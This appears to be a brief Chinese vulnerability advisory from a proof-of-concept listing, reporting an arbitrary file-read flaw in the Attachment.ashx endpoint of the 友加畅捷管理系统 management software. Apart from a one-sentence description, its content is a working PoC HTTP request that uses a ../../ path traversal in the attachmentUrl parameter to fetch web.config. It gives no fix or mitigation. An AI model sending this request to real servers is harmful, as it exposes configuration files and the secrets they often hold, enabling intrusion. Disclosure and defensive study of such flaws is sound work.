友加畅捷管理系统 Attachment.ashx 存在文件读取漏洞

日期: 2025-11-05 | 影响软件: 友加畅捷管理系统 | POC: 已公开

漏洞描述

友加畅捷管理系统 Attachment.ashx 接口存在文件读取漏洞,攻击者可获取系统配置文件信息

PoC代码

GET /Controllers/ajax/Attachment.ashx?attachmentUrl=../../web.config HTTP/1.1

相关漏洞推荐